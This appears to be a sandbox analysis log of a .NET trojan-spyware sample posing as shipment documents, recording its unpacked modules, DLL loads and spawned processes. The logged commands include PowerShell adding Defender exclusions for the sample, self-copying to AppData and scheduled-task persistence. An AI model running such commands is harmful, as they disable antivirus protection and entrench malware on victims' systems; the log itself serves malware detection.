Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, B--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, B--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, B--.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.SetAccessControl
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.AddAccessRule
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.SetAccessControl
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@25/15@3/4
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Mutant created: \Sessions\1\BaseNamedObjects\RDJCqbWVNpnzGVnTyiGSZiAgR
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File created: C:\Users\user\AppData\Local\Temp\tmp44A0.tmp Jump to behavior
Source: rShipmentDocuments.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rShipmentDocuments.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: rShipmentDocuments.exe Virustotal: Detection: 37%
Source: rShipmentDocuments.exe ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\rShipmentDocuments.exe File read: C:\Users\user\Desktop\rShipmentDocuments.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe" Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: iconcodecservice.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rShipmentDocuments.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
